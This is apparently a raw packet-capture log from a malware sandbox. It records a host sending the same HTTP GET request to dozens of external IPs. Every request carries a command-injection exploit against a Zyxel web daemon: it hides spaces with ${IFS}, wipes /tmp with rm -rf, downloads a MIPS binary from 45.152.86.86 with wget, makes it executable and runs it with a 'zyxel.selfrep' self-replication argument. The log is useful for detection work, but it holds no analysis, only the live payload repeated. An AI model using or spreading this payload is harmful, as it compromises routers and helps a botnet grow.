                                        Mar 31, 2024 09:20:45.429362059 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2246192.168.2.233551823.16.15.214443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.429450035 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2247192.168.2.2338112194.80.205.47443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.429506063 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2248192.168.2.235598451.148.160.164443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.429569006 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2249192.168.2.2338310156.18.146.136443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.429649115 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2250192.168.2.2349784212.166.202.46443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.429697037 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2251192.168.2.235329858.96.92.74443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.429785967 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2252192.168.2.2354134160.201.43.143443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.429887056 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2253192.168.2.2354754126.196.125.32443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.429928064 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2254192.168.2.2352542108.216.108.253443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.430003881 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2255192.168.2.233957462.79.246.185443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.430058002 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2256192.168.2.235422661.157.16.170443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.430135965 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2257192.168.2.2343806151.227.20.175443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.430197954 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2258192.168.2.2338686206.11.183.151443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.430277109 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2259192.168.2.2346730132.147.174.223443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.430335999 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2260192.168.2.235502083.136.169.207443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.430394888 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2261192.168.2.234855041.0.245.210443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.430454969 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2262192.168.2.234954672.160.187.148443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.430516005 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2263192.168.2.234200625.47.157.47443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.430577040 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2264192.168.2.235354695.34.134.234443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.430665016 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2265192.168.2.2360290122.195.64.173443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.430727959 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2266192.168.2.2336068154.236.150.192443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.430785894 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2267192.168.2.2346858115.253.66.195443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.430852890 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2268192.168.2.2355416145.111.110.37443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.430900097 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2269192.168.2.235682072.134.148.11443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.430960894 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2270192.168.2.2336132217.236.165.181443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.431015968 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2271192.168.2.2352576148.137.115.12443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.431073904 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2272192.168.2.2356016169.166.79.112443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.431126118 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2273192.168.2.2342872200.49.178.92443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.431176901 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2274192.168.2.2337864117.95.33.97443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.431252003 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2275192.168.2.2340312193.229.250.148443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.431317091 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2276192.168.2.2346116191.135.9.52443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.431402922 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2277192.168.2.233423874.187.212.121443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.431443930 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2278192.168.2.233512271.130.184.69443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.431509972 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2279192.168.2.2341822155.3.205.92443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.431571007 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2280192.168.2.235483641.16.164.116443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.431622982 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2281192.168.2.233659886.161.171.206443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.431689024 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2282192.168.2.2357822166.152.247.133443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.431749105 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2283192.168.2.2355926166.236.52.80443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.431806087 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2284192.168.2.236054275.138.29.163443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.431868076 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2285192.168.2.2358628106.0.241.113443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.431935072 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2286192.168.2.235859684.16.3.104443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.431994915 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2287192.168.2.233448643.18.7.21443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.432087898 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2288192.168.2.2354996173.117.82.245443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.432130098 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2289192.168.2.2346382168.166.190.54443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.432200909 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2290192.168.2.2356762128.27.147.12443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.432259083 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2291192.168.2.2354558102.174.224.255443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.432312012 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2292192.168.2.2348958153.157.141.127443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.432374954 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2293192.168.2.2354056143.228.44.110443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.432437897 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2294192.168.2.234140687.241.46.193443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.432501078 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2295192.168.2.233700488.53.67.112443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.432565928 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2296192.168.2.234139442.210.125.121443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.432636976 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2297192.168.2.2360118117.139.49.214443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.432692051 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2298192.168.2.2338338173.205.217.16443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.432749033 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2299192.168.2.2344424158.116.13.21443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.432826996 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2300192.168.2.2352034199.240.120.163443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.432876110 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2301192.168.2.2343268106.118.240.52443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.432946920 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2302192.168.2.2339272177.18.67.37443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.433007956 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2303192.168.2.2350044190.202.200.49443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.433062077 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2304192.168.2.2354174137.132.94.111443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.433135986 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2305192.168.2.2349716220.77.125.52443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.433191061 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2306192.168.2.2337362197.210.41.196443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.433279991 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2307192.168.2.2333890118.196.180.98443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.433330059 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2308192.168.2.235621859.203.197.215443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.433427095 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2309192.168.2.2350200128.178.48.120443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.433480024 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2310192.168.2.234059665.49.82.16443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.433546066 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2311192.168.2.235770698.95.181.97443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.433619976 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2312192.168.2.2350946168.162.23.138443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:45.433656931 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2313192.168.2.23436141.43.34.225443
                                        TimestampBytes transferredDirectionData
